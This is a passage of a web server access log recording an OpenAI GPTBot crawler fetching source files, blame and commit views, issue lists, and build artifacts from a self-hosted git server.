"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11147] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:18:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9835] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:18:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:18:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec?display=source" [Client 74.7.227.38] [Length 12307] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:18:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:18:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14913] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:18:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:09:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:18:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:18:09:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:18:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:18:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2530] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:18:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:18:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9839] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:18:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12862] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12772] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10329] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:18:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&state=all&type=all" +[17/Feb/2026:18:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13918] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12464] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13914] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12465] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13917] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__%2fnotifier.cpython-312.pyc" [Client 74.7.227.38] [Length 20814] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:18:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__%2fstorage.cpython-312.pyc" [Client 74.7.227.38] [Length 20821] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:18:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr 